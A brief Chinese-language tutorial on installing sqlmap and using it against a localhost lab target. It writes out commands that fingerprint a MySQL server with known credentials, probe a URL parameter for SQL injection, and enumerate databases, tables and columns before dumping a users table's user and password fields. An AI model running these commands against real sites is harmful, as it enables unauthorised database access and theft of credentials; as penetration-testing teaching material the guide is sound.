安装
安装python环境
将sqlmap文件夹放入python文件夹下
命令行进入sqlmap文件夹,运行python sqlmap.py
直连数据库
- 服务型数据库(前提是知道数据库用户名和密码)
例如:sqlmap -d “mysql://root:root@192.168.3.3:3306/joke” -f --banner --users
其中,两个root分别为账号密码,joke为数据库名称
-f fingerprint指纹
- 文件型数据库(前提知道数据库绝对路径)
DBMS://DATABASE_FILEPATH(SQLite,Mocrosoft Access,Firebird,etc)
URL探测
Sqlmap直接对单一URL探测,参数使用-u或–url
例如:sqlmap.py -u http://localhost/727/?id=1
-
获取数据库名字
sqlmap.py -u http://localhost/727/?id=1 --current-db
-
获取表名
sqlmap.py -u http://localhost/727/?id=1 -D joke --table
-
获取到字段名
sqlmap.py -u http://localhost/727/?id=1 -D joke -T users --columns
-
获取字段值
sqlmap.py -u http://localhost/727/?id=1 -D joke -T users -C user,pass --dump
注:之前跑过的记录会存在output文件夹中,若不删除记录,再次使用时会展示上次的记录